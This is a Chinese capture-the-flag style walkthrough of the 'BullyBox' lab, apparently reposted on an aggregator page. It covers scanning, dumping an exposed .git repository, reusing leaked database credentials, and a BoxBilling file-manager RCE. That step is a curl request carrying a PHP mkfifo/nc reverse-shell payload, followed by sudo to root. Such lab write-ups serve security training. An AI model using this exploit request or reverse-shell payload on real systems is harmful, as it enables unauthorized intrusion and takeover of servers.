当前位置: 首页 > news >正文

淘宝上做网站怎么样网站定位策划

news 2025/11/15 1:09:53
淘宝上做网站怎么样,网站定位策划,湖州网站建设企业,做电商网站就业岗位晋升主要知识点 如果发现有域名#xff0c;则可以加入/etc/hosts后重新执行nmap,nikto等扫描dirsearch的时候可以使用完整一些的字典文件#xff0c;避免漏掉信息.git dump 具体步骤 执行nmap 扫描#xff0c;发现 80和22端口开放,访问后发现被重定向到 bullybox.local Star…主要知识点 如果发现有域名则可以加入/etc/hosts后重新执行nmap,nikto等扫描dirsearch的时候可以使用完整一些的字典文件避免漏掉信息.git dump 具体步骤 执行nmap 扫描发现 80和22端口开放,访问后发现被重定向到 bullybox.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC Nmap scan report for 192.168.59.27 Host is up (0.00072s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Site doesnt have a title (text/html). |_http-server-header: Apache/2.4.52 (Ubuntu)尝试修改/etc/hosts将ip与bullybox.local绑定之后重新执行nmap扫描得到了更多的信息比如.git路径以及robots.txt中的entries Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT Nmap scan report for bullybox.local (192.168.174.27) Host is up (0.44s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) | http-robots.txt: 8 disallowed entries | /boxbilling/bb-data/ /bb-data/ /bb-library/ |_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/ |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Client Area | http-git: | 192.168.174.27:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file description to name the... |_ Last commit message: Ready For launch No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).访问robots.txt中的路径得到疑似admin用户名 利用搜索引擎寻找 可以dump .git的应用得到GitHub - arthaud/git-dumper: A tool to dump a git repository from a website,尝试运行后成功dump git代码库,如果配置了代理记得调用unset http_proxy,否则会报502错误 C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump /home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence \gmodified_content re.sub(UNSAFE, # \g0, content, flagsre.IGNORECASE) [-] Testing http://bullybox.local/.git/HEAD [502] [-] http://bullybox.local//.git/HEAD responded with status code 502C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master unset http_proxy C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump /home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence \gmodified_content re.sub(UNSAFE, # \g0, content, flagsre.IGNORECASE) [-] Testing http://bullybox.local/.git/HEAD [200] [-] Testing http://bullybox.local/.git/ [403] [-] Fetching common files [-] Fetching http://bullybox.local/.git/hooks/post-update.sample [200] [-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample [200] [-] Fetching http://bullybox.local/.git/hooks/post-commit.sample [404] [-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404 [-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample [200] [-] Fetching http://bullybox.local/.git/description [200] [-] Fetching http://bullybox.local/.gitignore [404] [-] http://bullybox.local/.gitignore responded with status code 404 [-] Fetching http://bullybox.local/.git/hooks/post-receive.sample [404] [-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404 [-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample [200] [-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG [200] [-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample [200] [-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample [200] [-] Fetching http://bullybox.local/.git/hooks/pre-push.sample [200] [-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample [200] [-] Fetching http://bullybox.local/.git/index [200] [-] Fetching http://bullybox.local/.git/objects/info/packs [404] [-] http://bullybox.local/.git/objects/info/packs responded with status code 404 [-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample [200]执行cat /bb-config.php发现疑似密码结合已经发现的用户名adminbullybox.local,登录成功 array (type mysql,host localhost,name boxbilling,user admin,password Playing-Unstylish7-Provided,),发现版本为4.22.1.5搜索一下发现有文件上传漏洞BoxBilling4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit尝试利用一下 先利用firefox得到Cookie中保存的phpsessionid并在本地启用nc -nlvp之后调用如下命令,我是用Postman调用的会生成下面的curl命令 curl --location http://bullybox.local/index.php?_url%2Fapi%2Fadmin%2FFilemanager%2Fsave_file \ --header Cookie: PHPSESSIDtjlfj0mpf85cjgh8g0rjtc0jnn \ --header Content-Type: application/x-www-form-urlencoded \ --data-urlencode order_id1 \ --data-urlencode pathreverse.php \ --data-urlencode data?php shell_exec(\rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 21 | nc 192.168.45.209 80/tmp/f\); ? 得到反弹shell,并且具备SUDO权限,可以直接拿到flag C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox nc -nlvp 80 listening on [any] 80 ... connect to [192.168.45.209] from (UNKNOWN) [192.168.226.27] 57090 bash: cannot set terminal process group (1311): Inappropriate ioctl for device bash: no job control in this shell To run a command as administrator (user root), use sudo command. See man sudo_root for details.yukibullybox:/var/www/bullybox$ id id uid1001(yuki) gid1001(yuki) groups1001(yuki),27(sudo) yukibullybox:/var/www/bullybox$ sudo -l sudo -l Matching Defaults entries for yuki on bullybox:env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser yuki may run the following commands on bullybox:(ALL : ALL) ALL(ALL) NOPASSWD: ALL yukibullybox:/var/www/bullybox$ sudo cat /root/proof.txt sudo cat /root/proof.txt 2cf1d3dd8eab874dd006dad9912c1388 yukibullybox:/var/www/bullybox$
http://www.zqtcl.cn/news/924220/

相关文章:

  • 中学生怎么做网站ghost 卸载wordpress
  • 网站诊断报告案例用户浏览网站的方式
  • 网站开发流程抚州做网站需要看的书
  • wordpress 禁止目录浏览网站seo推广优化
  • 源代码如何做网站高校门户网站建设需要多少钱
  • 深圳微商城网站制作报价基础网页设计教程
  • wordpress+vps建站大连网站建设运营
  • 第一次开票网站建设怎么开制作网站品牌公司哪家好
  • 医疗机械网站怎么做什么是o2o电商模式
  • 北京微网站建设设计服务营销导向的企业网站建设步骤
  • 网站 301网站设计评价标准
  • 网站页面设计规范大连装修公司哪家好
  • 祁东网站建设微信公众号做的网站
  • 火山开发软件可以开发网站吗盐城代运营
  • 网页制作与网站建设从入门到精通民宿客栈网站制作
  • 如何写手机适配网站自己做的网站能上传到凡科吗
  • 建设公司网站开发方案seo优化工具的种类
  • 没备案的网站怎么做淘客企业做网站服务费
  • 网址站点异常怎么解决机关单位建设网站 说明
  • 阿虎手机站青岛关键词排名系统
  • 西安网站建设聚星互联网站成功案例
  • 山东鲁为建设集团网站百度的合作网站有哪些
  • 电子商务网站建设与管理程序设计题6哪家微网站做的好
  • 网站建设图文片平面网页设计是什么
  • 域外网站宁波建设监理协会
  • 胶州网站建设公司哪家好wordpress怎么改标题
  • php网站开发综合案例免费注册推广网站
  • 邯郸做网站的地方广州网站制作
  • 企业网站制作公司24小时接单郑州手机网站推广外包
  • 接做施工图的网站手机移动网站模板